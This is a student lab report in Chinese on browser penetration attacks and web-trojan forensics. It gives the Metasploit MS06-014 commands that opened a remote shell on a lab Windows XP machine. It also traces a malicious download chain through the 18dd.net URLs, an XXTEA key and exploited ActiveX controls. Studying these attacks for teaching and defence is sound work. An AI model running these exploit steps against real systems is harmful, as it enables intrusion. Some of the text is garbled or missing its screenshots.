学号 20221916袁源《网络攻防实践》第11次作业
1.实验内容
(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析
实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
2.实验过程
web浏览器渗透攻击
-
在该实验过程中,使用kali(192.168.2.143)作为攻击机,winXP(192.168.2.152)作为靶机。
-
-
在kali上输入msfconsole,打开Metasploit软件。
-
输入
search MS06-014,发现只有一个可用的攻击模块;输入use 0,使用该模块进行攻击。 -
-
输入
set LHOST 192.168.2.143设置攻击机的地址;然后输入set payload windows/shell/bind_tcp设置载荷;最后输入exploit进行攻击。 -
-
在上图中可以看到得到了含有木马的网址:http://192.168.2.143:8080/pMCgLFBQtx。
去靶机win2k里浏览器访问上述网址: -
-
再次回到kali中,发现成功建立了会话。
-
-
然后为了验证会话是否有效,用
sessions查看连接。使用指令sessions -i 1打开会话。 -
-
取证分析实践—网页木马攻击场景分析
- 所以通过上传的start.html将其以txt文档的方式打开,在里面找到了new09.htm。
- 可以看到 new09.htm 文件中,用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件,又用 javascript 引用了一个http://js.users.51.la/1299644.js 文件。
- 我们对它们分别作 MD5 散列,得:
- 然后按照说明,我们下载这两个文件(使用同学提供的压缩包在winxp中进行):
http://192.168.68.253/scom/hashed/7f60672dcd6b5e90b6772545ee219bd3
http://192.168.68.253/scom/hashed/23180a42a2ff1192150231b44ffdf3d3
- 由于原网址出现问题,下面都是理论的状况。
- 根据由倒数第三行的:
t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74')),可以知道这个文件使用了一种XXTEA+Base64的加密方法,我们只要找到它的加密密钥即可,这是一种16进制加密,用16进制转字符串转换器解码,可以知道秘钥密钥为:script。 - 输入秘钥密钥 script ,将文件中的全部内容放到文本框中,点击“解密”,保存得到的结果。
- 加密者又用了另也就是十六进制加密,对引号内的内容解密,种加密方法,得:
- 真相果然大白于天下。这个文件简直就是一个木马群,利用到的应用程序漏洞有“Adodb.Stream”“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞。这些都是现在网络用户使用非常频繁的软件,其危害性可见一斑。另外,这个文件还引用三个 js 文件和一个压缩包(bd.cab,解开后是 bd.exe)。
- 再按照说明的提示,对“http://aa.18dd.net/aa/1.js”“http://aa.18dd.net/aa/b.is”“http://aa.18dd.net/aa/pps.js”和“http://down.18dd.net/bb/bd.cab”作处理。
- 结果如下
- MD5(http://aa.18dd.net/aa/1.js,32) = 5d7e9058a857aa2abee820d5473c5fa4
- MD5(http://aa.18dd.net/aa/b.js,32) = 3870c28cc279d457746b3796a262f166
- MD5(http://aa.18dd.net/aa/pps.js,32) = 5f0b8bf0385314dbe0e5ec95e6abedc2
- MD5(http://down.18dd.net/bb/bd.cab,32) = 1cd7b3539a617517c49eee4120783b2
-
依次下载这些文件,先看 1.js:
-
-
可以看到下载了014.exe。且有对 ADODB 漏洞的继续利用。
对http://down.18dd.net/bb/014.exe,继续做md5散列得md5(http://down.18dd.net/bb/014.exe,32) = ca4e4a1730b0f69a9b94393d9443b979
-
对其进行解密(开头的6个函数的参数提示这是一种加密方法:packed):
-
-
找到数据中0000的位置,往前数15位,得十六进制数据:对数据进行转换得url文件:http://down.18dd.net/bb/bf.exe,继续做md5散列得:
md5(http://down.18dd.net/bb/bf.exe,32) = 268cbd59fbed235f6cf6b41b92b03f8e -
pps.js,类似上述b.js,具体操作不再赘述。
-
-
得一url文件:http://down.18dd.net/bb/pps.exe, 继续做md5散列:
md5(http://down.18dd.net/bb/pps.exe,32) = ff59b3b8961f502289c1b4df8c37e2a4 -
压缩文件bd,打开为exe文件。将上述得到的四个文件.exe进行md5,发现其实是同一个文件,那随意分析一个即可。下面进行木马分析:使用IDA打开pps.exe
-
-
在string window中发现了20个用于下载exe文件的链接。
-
-
将上述20个文件用杀毒软件进行扫描,发现显示发现病毒。
-
-
查询可知,是一种网游密码病毒。
Web浏览器渗透攻击对抗实验
- 首先重复2.1的攻击过程,此处不再文字赘述。
- 然后将产生的链接复制到浏览器中,并且查看网页源代码,可以看到关键指令做了字符串拼接处理和大量的空白间隔。
- 使用在线软件去掉大量空白后,代码如下:
< html > < head > < title > < /title>EPboqnoNqNOztTdS- 从代码中可以看到调用了document.location加载了payload,并且下一行中后面跟了一个可执行文件 XHfsyzhkBIAE.exe,打开任务管理器可以发现该文件,可以肯定这就是攻击代码和攻击的程序。然后查找那串可以的数组 BD96C556 发现:
3.学习中遇到的问题及解决
- 问题1:使用win2k是总是显示连接失败
- 问题1解决方案:必须要在同一个网段的桥接模式才能成功,最后变成了使用winXP且都变成了桥接模式。
- 问题2:出现意外使用的网站下载不了
- 问题2解决方案:跳过这一步,使用同学的文档代替下载做。
4.学习感悟、思考等
学会了web渗透攻击。对如何进行web浏览器渗透攻击对抗进行了实验。了解了相关的知识。懂得了网页木马攻击的相关知识。
301
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
